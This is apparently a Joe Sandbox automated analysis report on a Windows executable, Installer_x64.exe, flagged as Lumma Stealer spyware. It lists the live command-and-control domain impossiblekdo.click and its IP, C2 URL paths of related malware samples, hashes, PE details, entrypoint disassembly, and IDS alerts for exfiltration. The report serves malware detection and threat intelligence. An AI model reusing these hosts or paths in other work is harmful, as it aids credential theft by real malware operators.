https://ac.ecosia.org/autocomplete?q=	BitLockerToGo.exe, 00000003.00000003.2359366893.00000000054D8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2359440172.00000000054D8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2359308789.00000000054DB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://developers.google.com/protocol-buffers/docs/reference/go/faq#namespace-conflictMemory	Installer_x64.exe	false		high
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg	BitLockerToGo.exe, 00000003.00000003.2383484499.0000000002FFD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	BitLockerToGo.exe, 00000003.00000003.2383484499.0000000002FFD000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	BitLockerToGo.exe, 00000003.00000003.2382198320.00000000054CA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://impossiblekdo.click/pi	BitLockerToGo.exe, 00000003.00000002.2454276330.00000000054A0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	BitLockerToGo.exe, 00000003.00000003.2383484499.0000000002FFD000.00000004.00000020.00020000.00000000.sdmp	false		high
http://127.0.0.1:5778/sampling09AZ__az	Installer_x64.exe, 00000000.00000002.2335092399.000000000B812000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://impossiblekdo.click/apiF	BitLockerToGo.exe, 00000003.00000003.2400854150.00000000054A2000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	BitLockerToGo.exe, 00000003.00000003.2383484499.0000000002FFD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://impossiblekdo.click/ks	BitLockerToGo.exe, 00000003.00000002.2454276330.00000000054A0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	BitLockerToGo.exe, 00000003.00000003.2359366893.00000000054D8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2359440172.00000000054D8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2359308789.00000000054DB000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.97.3	impossiblekdo.click	European Union		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1584540
Start date and time:	2025-01-05 19:41:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 39s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Installer_x64.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/0@1/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 91% Number of executed functions: 19 Number of non-executed functions: 125
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Installer_x64.exe, PID 6056 because there are no executed function
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Installer_x64.exe

Simulations

Behavior and APIs

Time	Type	Description
13:42:30	API Interceptor	8x Sleep call for process: BitLockerToGo.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.97.3	Gg6wivFINd.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	unasnetds.ru/eternalPython_RequestUpdateprocessAuthSqlTrafficTemporary.php
	Payment Receipt.exe	Get hash	malicious	FormBook	Browse	www.cifasnc.info/8rr3/
	dGhlYXB0Z3JvdXA=-free.exe	Get hash	malicious	Unknown	Browse	/api/get/free
	dGhlYXB0Z3JvdXA=-free.exe	Get hash	malicious	Unknown	Browse	/api/get/free
	RFQ 3100185 MAHAD.exe	Get hash	malicious	FormBook	Browse	www.rgenerousrs.store/o362/
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	www.beylikduzu616161.xyz/2nga/
	Delivery_Notification_00000260791.doc.js	Get hash	malicious	Unknown	Browse	radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
	ce.vbs	Get hash	malicious	Unknown	Browse	paste.ee/d/lxvbq
	Label_00000852555.doc.js	Get hash	malicious	Unknown	Browse	tamilandth.com/counter/?ad=1GNktTwWR98eDEMovFNDqyUPsyEdCxKRzC&id=LWkA9pJQhl9uXU1kaDN-eSC-55GNxzVDsLXZhtXL8Pr1j1FTCf4XAYGxA0VCjCQra2XwotFrDHGSYxM&rnd=25
	PO 20495088.exe	Get hash	malicious	FormBook	Browse	www.ssrnoremt-rise.sbs/3jsc/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
impossiblekdo.click	Insomia.exe	Get hash	malicious	LummaC	Browse	188.114.97.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Installer.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	104.21.32.1
	Insomia.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Aura.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	104.21.80.1
	loader.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	188.114.97.3
	LinxOptimizer.exe	Get hash	malicious	Unknown	Browse	172.67.75.163
	Script.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	104.21.80.1
	Setup.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	Set-up.exe	Get hash	malicious	LummaC	Browse	172.67.208.58
	Set-up.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	'Set-up.exe	Get hash	malicious	LummaC	Browse	172.67.178.174

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	Installer.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	188.114.97.3
	Insomia.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Aura.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	188.114.97.3
	loader.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	188.114.97.3
	Script.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	188.114.97.3
	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Set-up.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Set-up.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	'Set-up.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	setup.exe	Get hash	malicious	LummaC	Browse	188.114.97.3

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit):	6.389694357120118
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Installer_x64.exe
File size:	11'749'376 bytes
MD5:	9def2ab28d008fdcb73a0aa8e9e9d429
SHA1:	b8601f3d030e4c1f22eaeb30ea25648c1786b45e
SHA256:	c80d0ddd43303921c76ea1d153f8bb08c7c7f23a89b2e86cb38bf5cff18e0472
SHA512:	dee924299bf2056701e706d338438a02155bde43ff9d3bb1b3d3e077465fdb70e5a369656f5ca5555219094df774e335f81e2a068e4daac57688368a5b66bf4d
SSDEEP:	98304:yWQRxDODV7fSR5H2te0LkQLbHZYtJpvVGhqNI1xJTImypOzEpwM:RQqBteOutP4H1xJTINpSEpX
TLSH:	CBC63A90F9DB44F1EA07147044AB927F23305E098B29CFC7E6547F69E837AE11A3B159
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........F...............2Q..n......p&............@.......................................@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x472670
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	1
File Version Major:	6
File Version Minor:	1
Subsystem Version Major:	6
Subsystem Version Minor:	1
Import Hash:	ff9f3a86709796c17211f9df12aae74d

Entrypoint Preview

Instruction
jmp 00007FE358F39850h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov ecx, dword ptr [esp+04h]
sub esp, 28h
mov dword ptr [esp+1Ch], ebx
mov dword ptr [esp+10h], ebp
mov dword ptr [esp+14h], esi
mov dword ptr [esp+18h], edi
mov esi, eax
mov edx, dword ptr fs:[00000014h]
cmp edx, 00000000h
jne 00007FE358F3BBB9h
mov eax, 00000000h
jmp 00007FE358F3BC16h
mov edx, dword ptr [edx+00000000h]
cmp edx, 00000000h
jne 00007FE358F3BBB7h
call 00007FE358F3BCA9h
mov dword ptr [esp+20h], edx
mov dword ptr [esp+24h], esp
mov ebx, dword ptr [edx+18h]
mov ebx, dword ptr [ebx]
cmp edx, ebx
je 00007FE358F3BBCAh
mov ebp, dword ptr fs:[00000014h]
mov dword ptr [ebp+00000000h], ebx
mov edi, dword ptr [ebx+1Ch]
sub edi, 28h
mov dword ptr [edi+24h], esp
mov esp, edi
mov ebx, dword ptr [ecx]
mov ecx, dword ptr [ecx+04h]
mov dword ptr [esp], ebx
mov dword ptr [esp+04h], ecx
mov dword ptr [esp+08h], edx
call esi
mov eax, dword ptr [esp+0Ch]
mov esp, dword ptr [esp+24h]
mov edx, dword ptr [esp+20h]
mov ebp, dword ptr fs:[00000014h]
mov dword ptr [ebp+00000000h], edx
mov edi, dword ptr [esp+18h]
mov esi, dword ptr [esp+14h]
mov ebp, dword ptr [esp+10h]
mov ebx, dword ptr [esp+1Ch]
add esp, 28h
retn 0004h
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov ecx, dword ptr [esp+04h]
mov edx, dword ptr [ecx]
mov eax, esp

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb28000	0x410	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xb29000	0x3f906	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xab1c80	0xa8	.data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5131c5	0x513200	786dee21246b2421813ba2007c67b60d	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x515000	0x59a0c8	0x59a200	ab1bb1df9084545a15f38110dfc210fd	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xab0000	0x77ee8	0x46e00	76d1d313007e29eecc30f06fe6f5f673	False	0.4625117118606702	data	5.786975615337458	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0xb28000	0x410	0x600	2ee8db6d2996d4398abcc4356c757624	False	0.3359375	data	3.718762760146557	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0xb29000	0x3f906	0x3fa00	cd3958ee52eb150312bdef036e5f6fce	False	0.5305132612966601	data	6.62239124632486	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.symtab	0xb69000	0x4	0x200	07b5472d347d42780469fb2654b7fc54	False	0.02734375	data	0.020393135236084953	IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL

Import

kernel32.dll

WriteFile, WriteConsoleW, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetThreadPriority, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, PostQueuedCompletionStatus, LoadLibraryA, LoadLibraryW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetEnvironmentStringsW, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateWaitableTimerA, CreateThread, CreateIoCompletionPort, CreateFileA, CreateEventA, CloseHandle, AddVectoredExceptionHandler

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-05T19:42:30.280375+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49785	188.114.97.3	443	TCP
2025-01-05T19:42:31.188491+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49785	188.114.97.3	443	TCP
2025-01-05T19:42:31.188491+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49785	188.114.97.3	443	TCP
2025-01-05T19:42:31.684567+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49795	188.114.97.3	443	TCP
2025-01-05T19:42:32.175476+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	49795	188.114.97.3	443	TCP
2025-01-05T19:42:32.175476+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49795	188.114.97.3	443	TCP
2025-01-05T19:42:32.906016+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49804	188.114.97.3	443	TCP
2025-01-05T19:42:34.063432+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49812	188.114.97.3	443	TCP
2025-01-05T19:42:34.569869+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.5	49812	188.114.97.3	443	TCP
2025-01-05T19:42:35.260057+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49818	188.114.97.3	443	TCP
2025-01-05T19:42:37.026151+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49831	188.114.97.3	443	TCP
2025-01-05T19:42:38.474068+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49841	188.114.97.3	443	TCP
2025-01-05T19:42:41.744355+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49862	188.114.97.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 5, 2025 19:42:29.812916994 CET	49785	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:29.812952995 CET	443	49785	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:29.813082933 CET	49785	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:29.814553976 CET	49785	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:29.814568996 CET	443	49785	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:30.280304909 CET	443	49785	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:30.280375004 CET	49785	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:30.284465075 CET	49785	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:30.284473896 CET	443	49785	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:30.284706116 CET	443	49785	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:30.337924004 CET	49785	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:30.755603075 CET	49785	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:30.755738020 CET	49785	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:30.755768061 CET	443	49785	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:31.188489914 CET	443	49785	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:31.188569069 CET	443	49785	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:31.188627958 CET	49785	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:31.191231966 CET	49785	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:31.191237926 CET	443	49785	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:31.191263914 CET	49785	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:31.191267967 CET	443	49785	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:31.201901913 CET	49795	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:31.201924086 CET	443	49795	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:31.202003956 CET	49795	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:31.202406883 CET	49795	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:31.202425957 CET	443	49795	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:31.684475899 CET	443	49795	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:31.684566975 CET	49795	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:31.685668945 CET	49795	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:31.685672998 CET	443	49795	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:31.685870886 CET	443	49795	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:31.687002897 CET	49795	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:31.687026024 CET	49795	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:31.687066078 CET	443	49795	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:32.175465107 CET	443	49795	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:32.175532103 CET	443	49795	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:32.175561905 CET	443	49795	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:32.175590992 CET	443	49795	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:32.175610065 CET	49795	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:32.175628901 CET	443	49795	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:32.175652027 CET	49795	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:32.175679922 CET	443	49795	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:32.175721884 CET	443	49795	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:32.175751925 CET	443	49795	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:32.175766945 CET	49795	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:32.175775051 CET	443	49795	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:32.175789118 CET	49795	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:32.180221081 CET	443	49795	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:32.180274010 CET	49795	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:32.180282116 CET	443	49795	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:32.228501081 CET	49795	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:32.272428989 CET	443	49795	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:32.272485018 CET	443	49795	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:32.272576094 CET	49795	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:32.272584915 CET	443	49795	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:32.272728920 CET	443	49795	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:32.274929047 CET	49795	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:32.275002956 CET	49795	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:32.275012016 CET	443	49795	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:32.275021076 CET	49795	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:32.275026083 CET	443	49795	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:32.422910929 CET	49804	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:32.422956944 CET	443	49804	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:32.423024893 CET	49804	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:32.423316956 CET	49804	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:32.423337936 CET	443	49804	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:32.905906916 CET	443	49804	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:32.906016111 CET	49804	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:32.907247066 CET	49804	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:32.907258034 CET	443	49804	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:32.907469034 CET	443	49804	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:32.908828020 CET	49804	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:32.908970118 CET	49804	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:32.909004927 CET	443	49804	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:33.468955040 CET	443	49804	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:33.469074011 CET	443	49804	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:33.469156027 CET	49804	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:33.469367981 CET	49804	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:33.469379902 CET	443	49804	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:33.575985909 CET	49812	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:33.576033115 CET	443	49812	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:33.576138020 CET	49812	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:33.576473951 CET	49812	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:33.576486111 CET	443	49812	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:34.063358068 CET	443	49812	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:34.063431978 CET	49812	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:34.065030098 CET	49812	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:34.065035105 CET	443	49812	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:34.065260887 CET	443	49812	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:34.066329956 CET	49812	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:34.066442966 CET	49812	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:34.066464901 CET	443	49812	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:34.066518068 CET	49812	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:34.111331940 CET	443	49812	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:34.569864035 CET	443	49812	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:34.569964886 CET	443	49812	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:34.570202112 CET	49812	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:34.570712090 CET	49812	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:34.570717096 CET	443	49812	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:34.770834923 CET	49818	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:34.770896912 CET	443	49818	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:34.770987034 CET	49818	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:34.771245003 CET	49818	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:34.771260977 CET	443	49818	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:35.259990931 CET	443	49818	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:35.260056973 CET	49818	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:35.261130095 CET	49818	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:35.261135101 CET	443	49818	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:35.261334896 CET	443	49818	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:35.262542009 CET	49818	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:35.262645960 CET	49818	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:35.262680054 CET	443	49818	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:35.262748003 CET	49818	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:35.262758017 CET	443	49818	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:35.924444914 CET	443	49818	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:35.924545050 CET	443	49818	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:35.924611092 CET	49818	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:35.928281069 CET	49818	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:35.928306103 CET	443	49818	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:36.551387072 CET	49831	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:36.551429987 CET	443	49831	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:36.551510096 CET	49831	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:36.551763058 CET	49831	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:36.551776886 CET	443	49831	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:37.025971889 CET	443	49831	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:37.026150942 CET	49831	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:37.027142048 CET	49831	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:37.027154922 CET	443	49831	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:37.027371883 CET	443	49831	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:37.028755903 CET	49831	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:37.028855085 CET	49831	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:37.028861046 CET	443	49831	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:37.492106915 CET	443	49831	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:37.492217064 CET	443	49831	188.114.97.3	192.168.2.5
Jan 5, 2025 19:42:37.492463112 CET	49831	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:37.492571115 CET	49831	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:42:37.492577076 CET	443	49831	188.114.97.3	192.168.2.5
